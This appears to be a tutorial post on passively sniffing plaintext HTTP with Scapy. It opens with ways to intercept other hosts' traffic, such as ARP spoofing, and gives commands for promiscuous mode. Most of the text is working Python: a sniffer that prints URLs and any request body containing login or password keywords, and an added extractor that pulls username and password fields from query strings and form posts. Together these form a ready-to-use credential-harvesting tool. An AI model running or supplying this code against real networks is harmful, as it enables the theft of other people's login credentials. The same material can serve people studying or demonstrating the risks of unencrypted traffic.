Sniff network traffic with Scapy

There is always a chance of seeing someone else's unencrypted traffic, especially on a local network. You might get into that position with ARP spoofing, cache poisoning or a gateway attack, but Scapy is one of the best tools for checking what is actually on the wire.

Prerequisites

$sudo apt-get install python-scapy python-pip
$pip install scapy_http

scapy_http is a plugin that adds an HTTP layer to Scapy. Scapy 2.4.3 and later ship their own HTTP dissector (scapy.layers.http), so on a current install the plugin is only needed if that module is missing.

Enable promiscuous mode on the network interface so the NIC hands over frames that are not addressed to it
$sudo ifconfig eth0 promisc   (use your interface name; on newer systems: sudo ip link set eth0 promisc on)

It is best to try this from a VM on a bridged network, where the interface sees the same segment as the other hosts. To avoid interfering with anyone else, generate the test traffic (for example, a form login) from your own machine.

import argparse
import scapy.all as scapy
from scapy_http import http  # on Scapy >= 2.4.3, "from scapy.layers import http" works as well


def get_arguments():
    parser = argparse.ArgumentParser(description="Print plaintext HTTP requests seen on an interface")
    parser.add_argument("-i", "--interface", dest="interface", required=True,
                        help="Interface name")
    return parser.parse_args()


def as_text(value):
    """Scapy field values are bytes on Python 3; decode them safely for printing."""
    if isinstance(value, bytes):
        return value.decode("utf-8", errors="replace")
    return str(value)


def sniff_packet(interface):
    # store=False keeps memory flat on a busy link; prn is called for every packet
    scapy.sniff(iface=interface, store=False, prn=process_packets)


def get_url(packet):
    request = packet[http.HTTPRequest]
    return as_text(request.Host) + as_text(request.Path)


def get_credentials(packet):
    # The request body (e.g. a submitted login form) sits in the Raw layer after the headers
    if packet.haslayer(scapy.Raw):
        load = as_text(packet[scapy.Raw].load)
        keywords = ["login", "submission", "challenge", "password", "username", "user", "pass"]
        for keyword in keywords:
            if keyword in load:
                return load
    return None


def process_packets(packet):
    if packet.haslayer(http.HTTPRequest):
        url = get_url(packet)
        print("[+] HTTP Request >> " + url)
        credentials = get_credentials(packet)
        if credentials:
            print("[+] Someone has submitted a flag, interested? " + credentials + "\n\n")


if __name__ == "__main__":
    options = get_arguments()
    sniff_packet(options.interface)
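The script above dumps the whole request body whenever one of its keywords appears anywhere in it, which misses credentials sent in a GET query string (no Raw layer) and prints a lot of noise for bodies that merely contain the word "user". The following is an added example, not code from the original post: it parses the raw TCP payload of an HTTP/1.x request itself (standard library only, so it runs without Scapy or a live interface) and pulls out only form fields whose names look like credentials, from both the query string and a urlencoded POST body. The sample requests are constructed test data; the hostname intranet.example.test and the CRED_FIELDS list are assumptions. To use it live, feed it bytes(pkt[TCP].payload) from a Scapy prn callback.

```python
from urllib.parse import parse_qs

# Form field names treated as credentials (assumption; extend to taste).
CRED_FIELDS = ("username", "user", "login", "email", "password", "pass", "passwd", "pwd")

# Constructed sample payloads, i.e. what bytes(pkt[TCP].payload) would hold. Not real captures.
SAMPLE_POST = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: intranet.example.test\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 33\r\n"
    b"\r\n"
    b"username=alice&password=S3cret%21"
)
SAMPLE_GET = (
    b"GET /index.html HTTP/1.1\r\n"
    b"Host: intranet.example.test\r\n"
    b"User-Agent: curl/8.0\r\n"
    b"\r\n"
)
SAMPLE_GET_QUERY = (
    b"GET /search?user=bob&pass=hunter2 HTTP/1.1\r\n"
    b"Host: intranet.example.test\r\n"
    b"\r\n"
)


def parse_http_request(payload):
    """Split a raw HTTP/1.x request into (method, target, headers, body).

    Returns None when the payload is not an HTTP request line. Header names are
    lower-cased; the body is truncated to Content-Length so trailing bytes are
    never mistaken for form data.
    """
    head, _, body = payload.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
        return None
    method = parts[0].decode("ascii", "replace")
    target = parts[1].decode("ascii", "replace")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        if name:
            headers[name.strip().decode("ascii", "replace").lower()] = value.strip().decode("latin-1")
    try:
        length = int(headers.get("content-length", "0"))
    except ValueError:
        length = 0
    return method, target, headers, body[:length]


def get_url(payload):
    """Host + request target, mirroring the sniffer's get_url, or None if not HTTP."""
    parsed = parse_http_request(payload)
    if parsed is None:
        return None
    _, target, headers, _ = parsed
    return headers.get("host", "") + target


def extract_credentials(payload):
    """Return {field: value} for credential-looking form fields.

    Looks in the query string of any method and in the body of a
    urlencoded POST; everything else (JSON bodies, binary uploads) is ignored.
    """
    parsed = parse_http_request(payload)
    if parsed is None:
        return {}
    _, target, headers, body = parsed
    _, _, query = target.partition("?")
    sources = [query]
    content_type = headers.get("content-type", "").split(";")[0].strip().lower()
    if content_type == "application/x-www-form-urlencoded":
        sources.append(body.decode("latin-1"))
    found = {}
    for src in sources:
        for name, values in parse_qs(src, keep_blank_values=True).items():
            if name.lower() in CRED_FIELDS:
                found[name] = values[0]
    return found


if __name__ == "__main__":
    for sample in (SAMPLE_POST, SAMPLE_GET, SAMPLE_GET_QUERY):
        print("[+] HTTP Request >>", get_url(sample))
        creds = extract_credentials(sample)
        if creds:
            print("[+] Credentials:", creds)
```

Because it honours Content-Length and only treats urlencoded bodies as form data, a request whose User-Agent or body text happens to contain "user" or "pass" no longer triggers a hit; the cost is that a login posted as JSON needs a separate decoder.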
